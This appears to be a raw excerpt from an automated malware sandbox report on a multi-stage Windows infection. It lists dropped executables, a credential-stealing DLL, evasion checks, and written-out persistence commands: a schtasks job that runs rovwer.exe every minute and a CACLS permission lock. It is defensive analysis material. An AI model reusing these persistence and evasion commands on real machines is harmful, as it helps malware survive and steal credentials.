                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeUnpacked PE file: 12.2.2B4A.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\3790.exeUnpacked PE file: 13.2.3790.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeUnpacked PE file: 15.2.rovwer.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\6644.exeUnpacked PE file: 19.2.6644.exe.400000.0.unpack
                      Source: C:\Users\user\Desktop\S2XJ2wbz7u.exeUnpacked PE file: 0.2.S2XJ2wbz7u.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
                      Source: C:\Users\user\AppData\Roaming\tiddsjjUnpacked PE file: 11.2.tiddsjj.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeUnpacked PE file: 12.2.2B4A.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                      Source: C:\Users\user\AppData\Local\Temp\3790.exeUnpacked PE file: 13.2.3790.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeUnpacked PE file: 15.2.rovwer.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                      Source: C:\Users\user\AppData\Local\Temp\6644.exeUnpacked PE file: 19.2.6644.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
                      Source: 816F.exe.1.dr, RequireDashesIsolatedStoragePermissionAttribute/SpecialNameAttributeSByteArrayTypeInfo.cs.Net Code: IIDIEnumSTOREDEPLOYMENTMETADATAPROPERTYsetNextActivator System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 26.0.816F.exe.190000.0.unpack, RequireDashesIsolatedStoragePermissionAttribute/SpecialNameAttributeSByteArrayTypeInfo.cs.Net Code: IIDIEnumSTOREDEPLOYMENTMETADATAPROPERTYsetNextActivator System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\S2XJ2wbz7u.exeCode function: 0_2_00401268 push cs; iretd
                      Source: C:\Users\user\Desktop\S2XJ2wbz7u.exeCode function: 0_2_00402B84 push esp; iretd
                      Source: C:\Users\user\Desktop\S2XJ2wbz7u.exeCode function: 0_2_0040CE34 pushad ; iretd
                      Source: C:\Users\user\Desktop\S2XJ2wbz7u.exeCode function: 0_2_00412698 push ss; ret
                      Source: C:\Users\user\Desktop\S2XJ2wbz7u.exeCode function: 0_2_0040CF10 push edi; iretd
                      Source: C:\Users\user\AppData\Roaming\tiddsjjCode function: 11_2_00401268 push cs; iretd
                      Source: C:\Users\user\AppData\Roaming\tiddsjjCode function: 11_2_00402B84 push esp; iretd
                      Source: C:\Users\user\AppData\Roaming\tiddsjjCode function: 11_2_0040CE34 pushad ; iretd
                      Source: C:\Users\user\AppData\Roaming\tiddsjjCode function: 11_2_00412698 push ss; ret
                      Source: C:\Users\user\AppData\Roaming\tiddsjjCode function: 11_2_0040CF10 push edi; iretd
                      Source: C:\Users\user\AppData\Roaming\tiddsjjCode function: 11_2_009312CF push cs; iretd
                      Source: C:\Users\user\AppData\Roaming\tiddsjjCode function: 11_2_00931790 push 81396969h; iretd
                      Source: C:\Users\user\AppData\Roaming\tiddsjjCode function: 11_2_00B4F02F push edi; ret
                      Source: C:\Users\user\AppData\Roaming\tiddsjjCode function: 11_2_00B4EE1A push edx; retf
                      Source: C:\Users\user\AppData\Roaming\tiddsjjCode function: 11_2_00B4BA58 push es; retf
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: 12_2_0041C40C push cs; iretd
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: 12_2_00407CE6 push 8B0041E4h; retf
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: 12_2_0041C50E push cs; iretd
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: 12_2_0040E21D push ecx; ret
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: 12_2_0041C6BE push ebx; ret
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: 12_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
                      Source: 59FE.exe.1.drStatic PE information: section name: _RDATA
                      Source: 86EE.exe.1.drStatic PE information: real checksum: 0xae41 should be: 0x5a5ca
                      Source: cred64[1].dll.15.drStatic PE information: real checksum: 0x0 should be: 0x26b56
                      Source: 59FE.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x31822d
                      Source: cred64.dll.15.drStatic PE information: real checksum: 0x0 should be: 0x26b56
                      Source: 8C00.exe.1.drStatic PE information: real checksum: 0xae41 should be: 0x5a5ca
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.881559830047924

                      Persistence and Installation Behavior

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0000000F.00000002.556830130.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.542120947.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rovwer.exe PID: 4764, type: MEMORYSTR
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\tiddsjjJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\59FE.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\86EE.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\453D.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\3790.exeFile created: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeFile created: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dllJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6644.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\2B4A.exeJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\argq[1].exeJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Users\user\AppData\Roaming\PingboardCache\argq.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\816F.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8C00.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\tiddsjjJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6CEC.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dllJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\3790.exeJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" /F
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: Yara matchFile source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 6644.exe PID: 1916, type: MEMORYSTR
                      Source: Yara matchFile source: 19.2.6644.exe.950000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.6644.exe.12794a0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.6644.exe.12794a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000013.00000002.556838350.0000000001279000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\s2xj2wbz7u.exeJump to behavior
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\tiddsjj:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:N"
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3790.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6644.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6644.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: tiddsjj, 0000000B.00000002.378719538.0000000000B57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
                      Source: vbc.exe, 00000021.00000002.523011791.0000000000998000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-64
                      Source: C:\Users\user\AppData\Local\Temp\453D.exeFile opened: C:\Users\user\AppData\Local\Temp\0.txt count: 74827
                      Source: C:\Users\user\Desktop\S2XJ2wbz7u.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\S2XJ2wbz7u.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\S2XJ2wbz7u.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\S2XJ2wbz7u.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\S2XJ2wbz7u.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\S2XJ2wbz7u.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\tiddsjjKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\tiddsjjKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\tiddsjjKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\tiddsjjKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\tiddsjjKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\tiddsjjKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Windows\explorer.exe TID: 2136Thread sleep count: 646 > 30
                      Source: C:\Windows\explorer.exe TID: 4760Thread sleep count: 448 > 30
                      Source: C:\Windows\explorer.exe TID: 4760Thread sleep time: -44800s >= -30000s
                      Source: C:\Windows\explorer.exe TID: 5040Thread sleep count: 300 > 30
                      Source: C:\Windows\explorer.exe TID: 5040Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\explorer.exe TID: 1336Thread sleep count: 454 > 30
                      Source: C:\Windows\explorer.exe TID: 4116Thread sleep count: 282 > 30
                      Source: C:\Windows\explorer.exe TID: 4044Thread sleep count: 257 > 30
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe TID: 5456Thread sleep time: -510000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe TID: 160Thread sleep time: -50000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe TID: 244Thread sleep time: -1260000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe TID: 3424Thread sleep time: -360000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\59FE.exe TID: 2888Thread sleep count: 37 > 30
                      Source: C:\Users\user\AppData\Local\Temp\59FE.exe TID: 2888Thread sleep time: -37000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\6644.exe TID: 1920Thread sleep count: 198 > 30
                      Source: C:\Users\user\AppData\Local\Temp\6CEC.exe TID: 1096Thread sleep count: 9999 > 30
                      Source: C:\Users\user\AppData\Local\Temp\816F.exe TID: 5396Thread sleep count: 389 > 30
                      Source: C:\Windows\SysWOW64\explorer.exe TID: 5004Thread sleep count: 162 > 30
                      Source: C:\Windows\SysWOW64\explorer.exe TID: 5004Thread sleep time: -97200000s >= -30000s
                      Source: C:\Windows\SysWOW64\explorer.exe TID: 5004Thread sleep time: -600000s >= -30000s
                      Source: C:\Windows\explorer.exeLast function: Thread delayed
                      Source: C:\Windows\explorer.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\59FE.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\59FE.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\6644.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\explorer.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: 12_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeThread delayed: delay time: 180000
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeThread delayed: delay time: 360000
                      Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 600000
                      Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 600000
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 646
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 448
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 454
                      Source: C:\Users\user\AppData\Local\Temp\6CEC.exeWindow / User API: threadDelayed 9999
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeWindow / User API: threadDelayed 389
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\argq[1].exeJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PingboardCache\argq.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\86EE.exeRegistry key enumerated: More than 140 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeThread delayed: delay time: 30000
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeThread delayed: delay time: 50000
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeThread delayed: delay time: 180000
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeThread delayed: delay time: 360000
                      Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 600000
                      Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\86EE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                      Source: C:\Users\user\AppData\Local\Temp\86EE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                      Source: C:\Users\user\AppData\Local\Temp\86EE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                      Source: C:\Users\user\AppData\Local\Temp\86EE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                      Source: C:\Users\user\AppData\Local\Temp\86EE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                      Source: C:\Users\user\AppData\Local\Temp\86EE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                      Source: explorer.exe, 00000001.00000000.268626797.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
                      Source: vbc.exe, 00000021.00000002.540979642.0000000007542000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: 816F.exe, 0000001A.00000002.533641862.0000000000844000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\w
                      Source: rovwer.exe, 0000000F.00000002.559360064.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000021.00000002.531130327.00000000009E6000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000021.00000002.523011791.0000000000998000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
